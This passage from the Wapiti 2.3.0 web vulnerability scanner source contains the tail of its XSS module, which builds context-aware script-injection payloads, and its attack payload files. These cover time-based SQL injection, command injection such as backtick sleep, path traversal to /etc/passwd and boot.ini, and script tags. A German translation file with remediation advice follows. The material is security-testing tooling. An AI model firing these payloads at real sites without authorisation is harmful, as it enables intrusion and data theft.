                            if self._validXSSContentType(evil_req) and dat is not None and len(dat) > 1:
                                if payload.lower() in dat.lower():
                                    self.SUCCESSFUL_XSS[code] = payload
                                    self.logVuln(category=Vulnerability.XSS,
                                                 level=Vulnerability.HIGH_LEVEL,
                                                 request=evil_req,
                                                 parameter=param_name,
                                                 info=_("XSS vulnerability found via injection"
                                                        " in the parameter {0}").format(param_name))
                                    self.logR(Vulnerability.MSG_PARAM_INJECT,
                                              self.MSG_VULN,
                                              evil_req.url,
                                              param_name)
                                    self.logR(Vulnerability.MSG_EVIL_REQUEST)
                                    self.logC(evil_req.http_repr)
                                    print('')
                                    # Stop injecting payloads and move to the next parameter
                                    break
                                elif http_code == "500" and not returned500:
                                    self.logAnom(category=Anomaly.ERROR_500,
                                                 level=Anomaly.HIGH_LEVEL,
                                                 request=evil_req,
                                                 parameter=param_name,
                                                 info=Anomaly.MSG_PARAM_500.format(param_name))
                                    self.logO(Anomaly.MSG_500, evil_req.url)
                                    self.logO(Vulnerability.MSG_EVIL_REQUEST)
                                    self.logC(evil_req.http_repr)
                                    print('')
                                    returned500 = True

                # restore the saved parameter in the list
                params_list[i][1] = saved_value

    def closeNoscript(self, tag):
        """Return a string with each closing parent tags for escaping a noscript"""
        s = ""
        if tag.findParent("noscript"):
            curr = tag.parent
            while True:
                # closing tag for this ancestor
                s += "</{0}>".format(curr.name)
                if curr.name == "noscript":
                    break
                curr = curr.parent
        return s

    # type/name/tag ex: attrval/img/src
    def study(self, bs_node, parent=None, keyword="", entries=[]):
        #if parent==None:
        #  print("Keyword is: {0}".format(keyword))
        if keyword in str(bs_node):
            if isinstance(bs_node, BeautifulSoup.Tag):
                if keyword in str(bs_node.attrs):
                    for k, v in bs_node.attrs:
                        if keyword in v:
                            # print("Found in attribute value {0} of tag {1}".format(k, bs_node.name))
                            noscript = self.closeNoscript(bs_node)
                            d = {"type": "attrval", "name": k, "tag": bs_node.name, "noscript": noscript}
                            if d not in entries:
                                entries.append(d)
                        if keyword in k:
                            # print("Found in attribute name {0} of tag {1}".format(k, bs_node.name))
                            noscript = self.closeNoscript(bs_node)
                            d = {"type": "attrname", "name": k, "tag": bs_node.name, "noscript": noscript}
                            if d not in entries:
                                entries.append(d)
                elif keyword in bs_node.name:
                    # print("Found in tag name")
                    noscript = self.closeNoscript(bs_node)
                    d = {"type": "tag", "value": bs_node.name, "noscript": noscript}
                    if d not in entries:
                        entries.append(d)

                # recursively search injection points for the same variable
                for x in bs_node.contents:
                    self.study(x, parent=bs_node, keyword=keyword, entries=entries)

            elif isinstance(bs_node, BeautifulSoup.NavigableString):
                # print("Found in text, tag {0}".format(parent.name))
                noscript = self.closeNoscript(bs_node)
                d = {"type": "text", "parent": parent.name, "noscript": noscript}
                if d not in entries:
                    entries.append(d)

    # generate a list of payloads based on where in the webpage the js-code will be injected
    def generate_payloads(self, html_code, code):
        soup = BeautifulSoup.BeautifulSoup(html_code)  # the unmodified page must be kept in reserve...
        e = []
        self.study(soup, keyword=code, entries=e)

        payloads = []

        for elem in e:
            payload = ""
            # Try each case where our string can be found
            # Leave at the first possible exploitation found

            # Our string is in the value of a tag attribute
            # ex:
            if elem['type'] == "attrval":
                # print("tag -> {0}".format(elem['tag']))
                # print(elem['name'])
                i0 = html_code.find(code)
                # i1=html_code[:i0].rfind("=")
                try:
                    # find the position of name of the attribute we are in
                    i1 = html_code[:i0].rfind(elem['name'])
                # stupid unicode errors, must check later
                except UnicodeDecodeError:
                    continue

                start = html_code[i1:i0].replace(" ", "")[len(elem['name']):]
                # between the tag name and our injected attribute there is an equal sign
                # and (probably) a quote or a double-quote we need to close before putting our payload
                if start.startswith("='"):
                    payload = "'"
                if start.startswith('="'):
                    payload = '"'
                if elem['tag'].lower() == "img":
                    payload += "/>"
                else:
                    payload += ">"

                payload += elem['noscript']
                # ok let's send the requests
                for xss in self.independant_payloads:
                    js_code = payload + xss.replace("__XSS__", code)
                    if js_code not in payloads:
                        payloads.append(js_code)

                if elem['name'].lower() == "src" and elem['tag'].lower() in ["frame", "iframe"]:
                    js_code = "javascript:String.fromCharCode(0,__XSS__,1);".replace("__XSS__", code)
                    if js_code not in payloads:
                        payloads.insert(0, js_code)

            # we control an attribute name
            # ex:
            elif elem['type'] == "attrname":  # name,tag
                if code == elem['name']:
                    for xss in self.independant_payloads:
                        js_code = '>' + elem['noscript'] + xss.replace("__XSS__", code)
                        if js_code not in payloads:
                            payloads.append(js_code)

            # we control the tag name
            # ex:
            elif elem['type'] == "tag":
                if elem['value'].startswith(code):
                    # use independant payloads, just remove the first character (<)
                    for xss in self.independant_payloads:
                        payload = elem['noscript'] + xss.replace("__XSS__", code)
                        js_code = payload[1:]
                        if js_code not in payloads:
                            payloads.append(js_code)
                else:
                    for xss in self.independant_payloads:
                        js_code = "/>" + elem['noscript'] + xss.replace("__XSS__", code)
                        if js_code not in payloads:
                            payloads.append(js_code)

            # we control the text of the tag
            # ex:
            elif elem['type'] == "text":
                if elem['parent'] in ["title", "textarea"]:  # we can't execute javascript in those tags
                    if elem['noscript'] != "":
                        payload = elem['noscript']
                    else:
                        payload = "</{0}>".format(elem['parent'])
                elif elem['parent'] == "script":  # Control over the body of a script :)
                    # Just check if we can use brackets
                    js_code = "String.fromCharCode(0,__XSS__,1)".replace("__XSS__", code)
                    if js_code not in payloads:
                        payloads.insert(0, js_code)

                for xss in self.independant_payloads:
                    js_code = payload + xss.replace("__XSS__", code)
                    if js_code not in payloads:
                        payloads.append(js_code)

            html_code = html_code.replace(code, "none", 1)  # reduce the search area
        return payloads
wapiti-2.3.0+dfsg/wapitiCore/config/000077500000000000000000000000001240201516300172755ustar00rootroot00000000000000
wapiti-2.3.0+dfsg/wapitiCore/config/attacks/000077500000000000000000000000001240201516300207275ustar00rootroot00000000000000
wapiti-2.3.0+dfsg/wapitiCore/config/attacks/backupPayloads.txt000066400000000000000000000001621240201516300244310ustar00rootroot00000000000000
[FILE_NAME]~
[FILE_NAME].backup
[FILE_NAME].bck
[FILE_NAME].old
[FILE_NAME].save
[FILE_NAME].bak
.[FILE_NAME].swp
wapiti-2.3.0+dfsg/wapitiCore/config/attacks/blindSQLPayloads.txt000066400000000000000000000166301240201516300246430ustar00rootroot00000000000000
")/**/or/**/benchmark(10000000,MD5(1))#1 ')/**/or/**/benchmark(10000000,MD5(1))#1 1))/**/or/**/benchmark(10000000,MD5(1))#1 "))/**/or/**/benchmark(10000000,MD5(1))#1 '))/**/or/**/benchmark(10000000,MD5(1))#1 1/**/or/**/pg_sleep(__TIME__)--1 "/**/or/**/pg_sleep(__TIME__)--1 '/**/or/**/pg_sleep(__TIME__)--1 1)/**/or/**/pg_sleep(__TIME__)--1 ")/**/or/**/pg_sleep(__TIME__)--1 ')/**/or/**/pg_sleep(__TIME__)--1 1))/**/or/**/pg_sleep(__TIME__)--1 "))/**/or/**/pg_sleep(__TIME__)--1 '))/**/or/**/pg_sleep(__TIME__)--1 1/**/and/**/pg_sleep(__TIME__)--1 "/**/and/**/pg_sleep(__TIME__)--1 '/**/and/**/pg_sleep(__TIME__)--1 1)/**/and/**/pg_sleep(__TIME__)--1 ")/**/and/**/pg_sleep(__TIME__)--1 ')/**/and/**/pg_sleep(__TIME__)--1 1))/**/and/**/pg_sleep(__TIME__)--1 "))/**/and/**/pg_sleep(__TIME__)--1 '))/**/and/**/pg_sleep(__TIME__)--1 ' and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 " and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ') and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ") and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ')) and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ")) and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ';d=new Date();do{cd=new Date();}while(cd-d<10000);// ";d=new Date();do{cd=new Date();}while(cd-d<10000);// wapiti-2.3.0+dfsg/wapitiCore/config/attacks/execPayloads.txt000066400000000000000000000011261240201516300241110ustar00rootroot00000000000000;env a;env a);env [VALUE];env [VALUE][LF]env /e\0 a;exit(base64_decode('dzRwMXQxX2V2YWw='));// a;exit(base64_decode('dzRwMXQxX2V2YWw='));# ";exit(base64_decode('dzRwMXQxX2V2YWw='));// ";exit(base64_decode('dzRwMXQxX2V2YWw='));# ';exit(base64_decode('dzRwMXQxX2V2YWw='));// ';exit(base64_decode('dzRwMXQxX2V2YWw='));# ".exit(base64_decode('dzRwMXQxX2V2YWw='));// ".exit(base64_decode('dzRwMXQxX2V2YWw='));# 
'.exit(base64_decode('dzRwMXQxX2V2YWw='));// '.exit(base64_decode('dzRwMXQxX2V2YWw='));# exit(base64_decode('dzRwMXQxX2V2YWw='));// exit(base64_decode('dzRwMXQxX2V2YWw='));# a`)` a`sleep 600` wapiti-2.3.0+dfsg/wapitiCore/config/attacks/fileHandlingPayloads.txt000066400000000000000000000055361240201516300255620ustar00rootroot00000000000000http://www.google.fr/? /etc/passwd /etc/passwd\0 c:\\boot.ini c:\\boot.ini\0 ../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../etc/passwd\0 ../../../../../../../../../../../../../../../../../../../../etc/passwd\0 ../../../../../../../../../../boot.ini ../../../../../../../../../../../../../../../../../../../../boot.ini ../../../../../../../../../../boot.ini\0 ../../../../../../../../../../../../../../../../../../../../boot.ini\0 [VALUE]/../../../../../../../../../../etc/passwd [VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd [VALUE]/../../../../../../../../../../etc/passwd\0 [VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0 [VALUE]/../../../../../../../../../../boot.ini [VALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini [VALUE]/../../../../../../../../../../boot.ini\0 [VALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini\0 [DIRVALUE]/../../../../../../../../../../etc/passwd [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd [DIRVALUE]/../../../../../../../../../../etc/passwd\0 [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0 [DIRVALUE]/../../../../../../../../../../boot.ini [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini [DIRVALUE]/../../../../../../../../../../boot.ini\0 [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini\0 /etc/passwd\0index.htm /etc/passwd\0index.html /etc/passwd\0index.php 
/etc/passwd\0index.asp /etc/passwd\0index.aspx /etc/passwd\0index.css c:\\boot.ini\0index.htm c:\\boot.ini\0index.html c:\\boot.ini\0index.php c:\\boot.ini\0index.asp c:\\boot.ini\0index.aspx c:\\boot.ini\0index.css ../../../../../../../../../../etc/passwd\0index.htm ../../../../../../../../../../etc/passwd\0index.html ../../../../../../../../../../etc/passwd\0index.php ../../../../../../../../../../etc/passwd\0index.asp ../../../../../../../../../../etc/passwd\0index.aspx ../../../../../../../../../../etc/passwd\0index.css ../../../../../../../../../../etc/passwd\0pix.gif ../../../../../../../../../../boot.ini\0index.htm ../../../../../../../../../../boot.ini\0index.html ../../../../../../../../../../boot.ini\0index.php ../../../../../../../../../../boot.ini\0index.asp ../../../../../../../../../../boot.ini\0index.aspx ../../../../../../../../../../boot.ini\0index.css ../../../../../../../../../../boot.ini\0pix.gix ]>&xxe; ]>&xxe; .depdb .depdb\0 pearcmd.php pearcmd.php\0 [FILE_NAME] [FILE_NAME]\0 wapiti-2.3.0+dfsg/wapitiCore/config/attacks/xssPayloads.txt000066400000000000000000000050111240201516300237770ustar00rootroot00000000000000 ipt>alert('__XSS__') ipt>alert('__XSS__')ipt> ipt>alert("__XSS__") ipt>alert("__XSS__")ipt> ipt>String.fromCharCode(0,__XSS__,1) ipt>String.fromCharCode(0,__XSS__,1)ipt> ipt src=http://__XSS__/x.js> ipt src=http://__XSS__/x.js>ipt> wapiti-2.3.0+dfsg/wapitiCore/config/language/000077500000000000000000000000001240201516300210605ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/de/000077500000000000000000000000001240201516300214505ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/de/LC_MESSAGES/000077500000000000000000000000001240201516300232355ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/language/de/LC_MESSAGES/wapiti.mo000066400000000000000000000555411240201516300251010ustar00rootroot00000000000000$, %     '7IQ`p+b'r %BZi z!  
.htaccess bypass vulnerability: {0} Evil url: {0} coming from {0} * Intputs: * Method: {0} * Selects: * TextAreas: * URLs browsed * URLs to browse Notice(QUERY_STRING)+ attackGET {0}+ attackPOST {0} from {1}.NET SQL InjectionA report has been generated in the file {0}Access-Based SQL InjectionAcess-Based SQL InjectionAnomalies found:Attack process interrupted. To perform again the attack, lauch Wapiti with "-i" or "-k" parameter.BSD local file disclosure vulnerabilityBackup fileBackup file descriptionBackup file solutionBackup file {0} found for {1}Blind SQL InjectionBlind SQL Injection descriptionBlind SQL Injection solutionBlind SQL vulnerabilityCRLF InjectionCRLF descriptionCRLF solutionChoose the form you want to use :Command executionCommands executionCommands execution descriptionCommands execution solutionConnection refused!Cross Site ScriptingCross Site Scripting descriptionCross Site Scripting solutionDB2 InjectionDate of the scan : {0} Downloading from the web...Enter a number : Error downloading Nikto databaseError getting url {0}Error: The server did not understand this requestEvalutation warningEvil request:Evil request: Exception in lswww.browse: {0}File HandlingFile Handling descriptionFile Handling solutionFile disclosure vulnerability in include_pathFile {0} loaded, the scan continues:File {0} loaded. Wapiti will use it to perform the attackFile {0} not found, Wapiti will scan again the web siteFile {0} not found.
Wapiti will scan the web site againFirst argument must be the root url !Form {0}FormsForms InfoFound backup file !Found permanent XSS attacked by {0} with fields {1}Found permanent XSS in {0} with {1}From: {0}HtAccess protection found: {0}Htaccess BypassHtaccess bypass descriptionHtaccess bypass solutionInterbase InjectionInternal Server ErrorInternal server error descriptionInternal server error solutionInvalid argument for option {0} : {1}Invalid link argument: {0}Invalid protocol: {0}Involved parameter: {0}Java.SQL InjectionLDAP InjectionLinux local file disclosure vulnerabilityMSSQL-Based InjectionMake sure the url is correct.MySQL InjectionNo forms found in this page !No links or forms found in this page !Open {0}/index.html with a browser to see this report.Oracle InjectionPHP evaluationPlease enter values for the following form: Possible {0} vulnerabilityPostgreSQL InjectionPotentially dangerous filePotentially dangerous file descriptionPotentially dangerous file solutionProblem with local nikto database.Received a HTTP 500 error in {0}References:Remote inclusion vulnerabilityReportReport for {0} Resource consumptionResource consumption descriptionResource consumption solutionSQL InjectionSQL Injection descriptionSQL Injection solutionScan stopped, the data has been savedin the file {0}/{1}.xmlScope of the scan : {0} Source code:Stored XSS vulnerabilitySummary of vulnerabilities :Sybase InjectionThe request timed out while attempting to inject a payload in the parameter {0}The request timed out while attempting to inject a payload in the query stringThe request timed out while attempting to inject a payload in the resource pathThe server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}The server responded with a 500 HTTP error code while attempting to inject a payload in the query stringThe server responded with a 500 HTTP error code while attempting to inject a payload in the resource pathThis scan has been 
saved in the file {0}/{1}.xmlTimeout occured in {0}To continue this scan, you should launch Wapiti with the "-i" parameterTo: {0}URLSURLsUpload ScriptsUpload scripts found:Wapiti-2.3.0 (wapiti.sourceforge.net)Warning assertWarning execWarning usort()Windows local file disclosure vulnerabilityXPath InjectionXSS vulnerabilityXSS vulnerability found via injection in the parameter {0}XSS vulnerability found via injection in the query stringXSS vulnerability found via injection in the resource pathYou can use it to perform attacks without scanning again the web site with the "-k" parameter[!] Missing dependecies for module {0}:[!] Unable to find a module named {0}[*] Loading modules:[+] Launching module {0}cURL command PoC : "{0}"error: timeout while attacking {0}error: {0} while attacking {1}highlight_file() vulnerability in basedirinclude() of file in include_pathpreg_replace injectionurl = {0}wapitiDoc{0} : {1:>3} {0} HtAccess{0} in {1} via injection in the parameter {2}{0} in {1} via injection in the query string{0} in {1} via injection in the resource path{0} via injection in the parameter {1}{0} via injection in the query string|HTTP Code: {0}|HTTP Code: {0} : {1}Project-Id-Version: Wapiti SVN Report-Msgid-Bugs-To: POT-Creation-Date: 2013-08-25 17:33+0200 PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE Last-Translator: FULL NAME Language-Team: LANGUAGE Language: MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit .htaccess bypass-Schwachstelle: {0} Böse URL: {0} von {0} kommend * Eingabefelder: * Methode: {0} * Auswahlfelder: * Textbereiche: * URLs durchsucht * URLs zu durchsuchen Hinweis(QUERY_STRING)+ attackGET {0}+ attackPOST {0} von {1}.NET SQL InjektionEin Bericht wurde in der Datei {0} erzeugtAccess-basierte SQL-InjektionAcess-basierte SQL InjektionAnomalien gefunden:Angriffsprozess wurde unterbrochen. 
Um den Angriff neu zu starten, führen Sie Wapiti mit den "-i" oder "-k" Parametern aus.BSD lokale Datei-Disclosure SchwachstelleSicherungsdateiEs könnte möglich sein, Sicherungsdateien von Skripten auf dem Webserver zu finden, die der Webadmin dort abgelegt hat um eine ältere Version zu speichern oder es könnten automatisch erzeugte Sicherungsdateien der Editor-Software sein (zum Beispiel Emacs). Diese Kopien könnten interessante Informationen wie Quellcode oder Zugangsdaten enthaltenDer Webadmin muss die Sicherungsdateien manuell vom Server löschen oder sie aus dem Wurzelverzeichnis entfernen. Er sollte auch seinen Editor neu konfigurieren, um automatische Sicherungen zu deaktivieren.Sicherungsdatei {0} gefunden für {1}Blinde SQL InjektionBlinde SQL-Injection ist eine Technik, die eine Schwachstelle ausnutzt, die in der Datenbank einer Anwendung auftritt. Diese Art von Schwachstelle ist schwerer zu erkennen als einfache SQL-Inkektionen weil keine Fehlermeldungen auf der Webseite ausgegeben werden.Um sich gegen SQL-Injektion zu schützen, sollten Nutzereingaben nicht direkt in SQL-Abfragen eingebettet werden. Stattdessen sollten Nutzereingaben 'escaped' oder gefiltert werden oder es sollten parametrisierte Abfragen verwendet werden.Blinde SQL-InjektionCRLF-InjektionDer Begriff CRLF verweist auf den 'Carriage Return' (ASCII 13, \r) 'Line Feed' (ASCII 10, \n). Es wird genutzt um das Zeilende festzulegen, allerdings wird damit in heutigen häufig genutzten Betriebssystemen unterschiedlich umgegangen. Zum Beispiel: In Windows werden sowohl CR als auch LF benötigt, um ein Zeilenende festzulegen, wohingegen unter Linux/ UNIX nur ein LF benötigt wird. Diese Kombination aus CR und LF wird zum Beispiel benutzt wenn man 'Enter' auf der Tastatur drückt. 
Abhängig von der genutzten Anwendung weist 'Enter' diese an, eine neue Zeile zu beginnen oder um einen Befehl zu senden.Prüfen Sie die angegebenen Parameter verhindern Sie die Injektion von CRLF, indem Sie es filternWählen Sie ein Formular aus :BefehlsausführungBefehlsausführungDieser Angriff besteht darin, auf dem Server Befehle auszuführen. Der Angreifer versucht, diese Befehle in die Anfrageparameter zu injizierenBei Dateisystemaufrufen vorzugsweise ohne Nutzereingaben arbeitenVerbindung abgelehnt!Cross-Site ScriptingCross-Site-Scripting (XSS) ist eine Art von Schwachstelle, die häufig in Webanwendungen gefunden wird, die es erlauben, dass Code von bösartigen Nutzern in Webseiten, die von anderen Nutzern eingesehen werden können, injiziert wird. Beispiele solcher Codes sind HTML-Codes und clientseitige Skripte.Die Beste Art, eine Webanwendung vor XSS-Attacken zu schützen ist sicherzustellen, dass die Anwendung eine Validierung aller Header, Cookies, Query-Strings, Formularfelder und versteckter Felder durchführt. Das Kodieren von Nutzereingaben auf dem Server kann auch XSS-Schwachstellen besiegen, indem man verhindert, dass in Formularen ausführbare Skripte eingefügt werden können. Anwendungen können einen signifikanten Schutz vor JavaScript-basierten Angriffen erlangen, indem sie die folgenden Zeichen in der gesamten Ausgabe durch die entsprechenden HTML-Entities umwandeln: <, >, &, ", ', (, ), #, %, ; , +, -.DB2 InjektionDatum des Scans : {0} Lade aus dem Web herunter...Geben Sie eine Nummer ein : Fehler beim Herunterladen der Nikto-DatenbankFehler beim Abruf der URL {0}Fehler: Der Server hat die Anfrage nicht verstandenEvaluations-WarnungBöse Anfrage:Bösartige Anfrage: Ausnahme in lswww.browse: {0}DateihandhabungDieser Angriff ist auch bekannt als 'Path Traversal' oder 'Directory Traversal', sein Ziel ist es, den Zugriff zu Dateien und Verzeichnissen, die außerhalb des Webroots liegen, zu erlangen. 
Der Angreifer versucht, die Verzeichnisse auf dem Webserver zu erkunden. Der Angreifer benutzt dabei einige Techniken, zum Beispiel die Manipulation der Variablen die auf Dateien verweisen mit Sequenzen von 'Punkt-Punkt-Slash (../)' und deren Variationen, um zum Wurzelverzeichnis zu wechseln und so durch das Dateisystem zu navigieren.Ziehen Sie es vor, ohne Nutzereingaben zu arbeiten, wenn Sie Systemaufrufe verwenden. Nutzen Sie besser tatsächliche Dateinamen in Templates oder Sprachdateien (z.B.: Der Wert 5 aus der Nutzereingabe = Tschechisch, anstatt zu erwarten, dass der Nutzer 'Tschechisch' übergibt). Stellen Sie sicher, dass Nutzer nicht alle Teile eines Dateipfades übergeben können - stellen Sie Ihren Pfad selbst voran. Validieren Sie Nutzereingaben, indem Sie nur gute Eingaben akzeptieren - verbessern Sie die Eingaben nicht. Nutzen Sie durch chroot geschützte Bereiche und Codezugangsrichtlinien, um einzuschränken, wo Dateien gelesen oder gespeichert werden können.Datei-Disclosure Schwachstelle im include_pathDatei {0} geladen, der Scan wird fortgesetzt:Datei {0} geladen. Wapiti wird sie nutzen, um den nächsten Angriff durchzuführenDatei {0} nicht gefunden, Wapiti wird die Website noch einmal scannenDatei {0} nicht gefunden. Wapiti wird die Website erneut scannenErster Parameter muss die root-URL sein !Formular {0}FormulareFormular-InfoSicherungsdatei gefunden !Persistentes XSS gefunden, angegriffen durch {0} mit den Feldern {1}Persistentes XSS gefunden in {0} mit {1}Von: {0}HtAccess Schutz gefunden: {0}Htaccess Überwindunghtaccess-Dateien werden genutzt um Zugriffe auf einige Dateien über HTTP einzuschränken. In einigen Fällen kann es möglich sein, diese Einschränkungen zu umgehen und auf diese Dateien zuzugreifen.Stellen Sie sicher, dass bei falschen Zugangsdaten jede HTTP-Methode verboten ist.Interbase InjektionInterner Server FehlerEin Fehler der es verhindert die Anfrage zu verarbeiten ist auf der Serverseite aufgetreten. 
Es könnte das Anzeichen einer Schwachstelle seinWeitere Informationen über den Fehler sollten Sie in den Serverlogs finden.Ungültiger Parameter für die Option {0} : {1}Ungültiger Link-Parameter: {0}Ungültiges Protokoll: {0}Betreffender Parameter: {0}Java.SQL InjektionLDAP InjektionLinux lokale Datei-Disclosure SchwachstelleMSSQL-basierte InjektionPrüfen Sie, ob die URL korrekt ist.MySQL InjektionKeine Formulare auf der Seite gefunden !Keine Links oder Formulare auf der Seite gefunden !Öffnen Sie {0}/index.html in einem Browser um diesen Bericht zu sehen.Oracle InjektionPHP-InterpretationBitte geben Sie Werte für das folgende Formular ein: Mögliche {0} SchwachstellePostgreSQL InjektionMöglicherweise gefährliche DateiEine Datei mit möglichen Schwachstellen wurde auf der Website gefundenStellen Sie sicher, dass das Skript auf dem neuesten Stand ist und schränken Sie den Zugriff darauf einProblem mit der lokalen nikto-Datenbank.HTTP Fehler 500 erhalten in {0}Referenzen:Entfernte Datei-Inklusions-SchwachstelleBerichtBericht für {0} RessourcenverbrauchDer Server brauchte eine ungewöhnlich lange Zeit, um die Anfrage zu verarbeiten. Ein Angreifer könnte diese Schwachstelle nutzen um den Server zu überladenDas betreffende Skript könnte Serverressourcen (CPU, Arbeitsspeicher, Netzwerk, Dateizugriff...) auf ineffiziente Weise nutzenSQL InjektionSQL-Injektions-Schwachstellen erlauben einem Angreifer, die Abfragen die in der Datenbank ausgeführt werden, zu verändern. Ein Angreifer könnte dann in der Lage sein, Informationen die in der Datenbank gespeichert sind auszulesen, zu verändern oder sogar seine Priviligien auf dem System zu erhöhen.Um sich gegen SQL-Injektion zu schützen, sollten Nutzereingaben nicht direkt in SQL-Abfragen eingebettet werden. 
Stattdessen sollten Nutzereingaben 'escaped' oder gefiltert werden oder es sollten parametrisierte Abfragen genutzt werden.Scan gestoppt, die Daten wurden in der Datei {0}/{1}.xml gespeichertSuchmuster des Scans : {0} Quellcode:Persistente XSS-SchwachstelleZusammenfassung der Schwachstellen :Sybase InjektionZeitüberschreitung der Anfrage beim Versuch ein Payload in den Parameter {0} zu injizierenZeitüberschreitung der Anfrage beim Versuch ein Payload in den Query-String zu injizierenZeitüberschreitung der Anfrage beim Versuch ein Payload in den Ressourcenpfad zu injizierenDer Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Parameter {0} zu injizierenDer Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Query-String zu injizierenDer Server antwortete mit einem HTTP-Fehlercode 500 beim Versuch ein Payload in den Ressourcenpfad zu injizierenDieser Scan wurde in der Datei {0}/{1}.xml gespeichertZeitlimit überschritten in {0}Um diesen Scan fortzusetzen, sollten Sie Wapiti mit dem "-i" Parameter startenAn: {0}URLSURLsUpload-SkripteUpload-Skripte gefunden:Wapiti-2.3.0 (wapiti.sourceforge.net)Assert-WarnungWarnung execusort()-WarnungWindows lokale Datei-Disclosure SchwachstelleXPath InjektionXSS-SchwachstelleXSS -Schwachstelle gefunden durch Injektion in den Parameter {0}XSS-Schwachstelle gefunden durch Injektion in den Query-StringXSS-Schwachstelle gefunden durch Injektion in den RessourcenpfadSie können es nutzen, um Angriffe ohne erneuten Scan der Website mit dem "-k" Parameter durchzuführen[!] Fehlende Abhängigkeiten für Modul {0}:[!] 
Konnte kein Modul mit dem Namen {0} finden[*] Lade Module:[+] Starte Modul {0}cURL Befehl PoC : "{0}"Fehler: Zeitüberschreitung während des Angriffs auf {0}Fehler: {0} während des Angriffs auf {1}highlight_file() Schwachstelle im basedirinclude() von Datei im include_pathpreg_replace-InjektionURL = {0}Wapiti-2.3.0 - Sicherheitsscanner für Webanwendungen Befehlszeile: python wapiti.py http://server.com/base/url/ [Optionen] Unterstützte Optionen sind: -s --start Um eine URL anzugeben, von der begonnen werden soll. Diese Option kann mehrfach verwendet werden. Wapiti wird diese Links nach weiteren URLs durchsuchen, auch wenn der angegebene Link nicht dem Suchmuster entspricht. -x --exclude Um eine URL vom Scan auszulassen (z.B. Logout-URLs). Diese Option kann für verschiedene URLs mehrfach verwendet werden. Platzhalter (*) können in der URL für einfache reguläre Ausdrücke verwendet werden. Beispiel : -x http://server/base/?page=*&module=test or -x http://server/base/admin/* um ein Verzeichnis auszulassen. -p --proxy Um einen Proxy anzugeben. Zur Zeit werden HTTP- und HTTPS-Proxys unterstützt. Diese Option kann mehrfach verwendet werden, um HTTP- und HTTPS-Proxys anzugeben. Beispiel: -p http://proxy:port/ -c --cookie Um Cookies für den Scan zu importieren. Die Cookie-Datei muss im JSON-Format sein. Cookies können mit Hilfe der Werkzeuge cookie.py und getcookie.py (net-Verzeichnis) aufgezeichnet werden. -t --timeout Um ein Zeitlimit zu setzen (Maximalzeit in Sekunden, die auf eine Serverantwort gewartet werden soll). -a --auth Zugangsdaten für HTTP-Authentifizierung setzen. --auth-method Wenn der Server eine Authentifizierung erfordert, kann so die Authentifizierungsmethode gesetzt werden. Zur Zeit unterstützte Methoden sind (einige erfordern die Installation von Zusatzmodulen): + basic + digest + kerberos + ntlm -r --remove Einen Parameter (Name und Wert) von URLs entfernen. -n --nice Eine Maximale Anzahl von URLs mit dem gleichen Suchmuster festlegen (z.B. 
die maximale Anzahl einzigartiger Werte für einen Parameter). Benutzen Sie diese Option, um Endlosschleifen während des Scans zu verhindern. Das Limit muss größer als 0 sein. -m --module Module (und HTTP-Methoden für jedes Modul) für die Angriffe festlegen. Einem Modul kann ein Bindestrich vorangestellt werden, um es zu deaktivieren. Um das Ziel nur zu durchsuchen (ohne Payloads zu senden), deaktivieren Sie jedes Modul mit -m "-all". Ohne Festlegung von HTTP-Methoden werden GET und POST verwendet. Beispiel: -m "-all,xss:get,exec:post" -u --color Farben benutzen, um Verwundbarkeiten und Anomalien in der Ausgabe zu markieren. -v --verbose Protokollierungstiefe festlegen. 0: Leise (Standard), 1: Jede URL ausgeben, 2: Jeden Angriff ausgeben. -b --scope Suchmuster festlegen: + page: um eine Seite zur analysieren, die als root-URL festgelegt wurde. + folder: um alle URLs unterhalb der root-URL, die an Wapiti übergeben wurde, zu analysieren. (Standard). + domain: um alle Links zu den Seiten zu analysieren, die innerhalb der gleichen Domain sind wie die URL, die an Wapiti übergeben wurde. -f --format Format für den Bericht festlegen. json: Report im JSON-Format html: Report im HTML-Format (Standard) openvas: Report im OpenVAS XML-Format txt: Report im Klartext (UTF-8) vulneranet: Report im VulneraNET-Format (XML basiert) xml: Report im XML-Format -o --output Den Dateinamen des Berichts festlegen. Wenn der Bericht im Format 'html' ist, wird dieser Parameter als Verzeichnisname benutzt. -i --continue Dieser Parameter weist Wapiti an, den letzten Scan der in der XML-Statusdatei gespeichert wurde, fortzusetzen. Der Dateiname ist optional, falls nicht festgelegt, wird Wapiti die Standard- Datei aus dem "scans"-Verzeichnis nutzen. -k --attack Dieser Parameter weist Wapiti an, die Angriffe fortzusetzen ohne die Website erneut zu scannen, indem es den Status aus der festgelegten Datei lädt. 
